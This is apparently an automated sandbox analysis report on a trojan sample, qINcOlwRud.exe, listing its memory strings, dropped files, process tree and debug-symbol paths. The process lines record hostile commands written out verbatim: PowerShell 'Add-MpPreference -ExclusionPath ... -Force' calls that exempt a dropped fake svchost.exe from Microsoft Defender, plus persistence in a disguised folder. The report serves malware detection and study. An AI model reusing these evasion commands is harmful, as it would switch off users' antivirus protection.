            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
            Source: qINcOlwRud.exe, 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
            Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
            Source: qINcOlwRud.exe, 00000000.00000002.269153211.00000000011BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\qINcOlwRud.exeCode function: 0_2_01174448
            Source: C:\Users\user\Desktop\qINcOlwRud.exeCode function: 0_2_01174B08
            Source: C:\Users\user\Desktop\qINcOlwRud.exeCode function: 0_2_0117ED30
            Source: C:\Users\user\Desktop\qINcOlwRud.exeCode function: 0_2_0117C10C
            Source: C:\Users\user\Desktop\qINcOlwRud.exeCode function: 0_2_0117D6D8
            Source: C:\Users\user\Desktop\qINcOlwRud.exeCode function: 0_2_0117D92C
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeCode function: 13_2_015D2207
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeCode function: 13_2_015D2A08
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeCode function: 13_2_015D9EAC
            Source: Joe Sandbox ViewDropped File: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe 552A8D763C86BB50DED18CF8F790F18828C471EC5A4D3CAC71EAF7693314A04C
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 1936
            Source: qINcOlwRud.exe, 00000000.00000000.207154694.0000000000ABA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.388289726.0000000005F60000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.269988009.00000000013C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.269963750.00000000013B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.382192537.0000000005520000.00000002.00000001.sdmpBinary or memory string: originalfilename vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.382192537.0000000005520000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHjwp TPs.exe2 vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.269153211.00000000011BA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.377981680.0000000005430000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 0000000A.00000000.254365298.000000000075A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs qINcOlwRud.exe
            Source: qINcOlwRud.exeBinary or memory string: OriginalFilenameDimbono.exe0 vs qINcOlwRud.exe
            Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
            Source: classification engineClassification label: mal100.troj.evad.winEXE@53/25@4/2
            Source: C:\Users\user\Desktop\qINcOlwRud.exeFile created: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEVJump to behavior
            Source: C:\Users\user\Desktop\qINcOlwRud.exeFile created: C:\Users\user\QTSKUnyljdzYWpkbMIVLIBDYJvtcjEAJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6652:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:160:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_01
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5476
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3ochp5k.jrz.ps1Jump to behavior
            Source: qINcOlwRud.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\qINcOlwRud.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\qINcOlwRud.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\qINcOlwRud.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\qINcOlwRud.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\qINcOlwRud.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\qINcOlwRud.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\qINcOlwRud.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: qINcOlwRud.exeVirustotal: Detection: 21%
            Source: qINcOlwRud.exeReversingLabs: Detection: 27%
            Source: C:\Users\user\Desktop\qINcOlwRud.exeFile read: C:\Users\user\Desktop\qINcOlwRud.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\qINcOlwRud.exe 'C:\Users\user\Desktop\qINcOlwRud.exe'
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Users\user\Desktop\qINcOlwRud.exe C:\Users\user\Desktop\qINcOlwRud.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: unknownProcess created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe'
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 1936
            Source: unknownProcess created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe'
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Users\user\Desktop\qINcOlwRud.exe C:\Users\user\Desktop\qINcOlwRud.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
            Source: C:\Users\user\Desktop\qINcOlwRud.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ac9fbe1-e0a2-4ad6-b4ee-e212013ea917}\InProcServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\qINcOlwRud.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Users\user\Desktop\qINcOlwRud.exeDirectory created: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEVJump to behavior
            Source: C:\Users\user\Desktop\qINcOlwRud.exeDirectory created: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeJump to behavior
            Source: qINcOlwRud.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: qINcOlwRud.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: System.Core.ni.pdbRSDSD source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Xml.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: Accessibility.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.PDB source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: np6pVisualBasic.pdb43 source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
            Source: Binary string: System.Drawing.pdb`] source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: np6pVisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\qINcOlwRud.PDB source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
            Source: Binary string: System.Configuration.pdb source: WER66E4.tmp.dmp.14.dr
            Source: Binary string: .pdb% source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmp
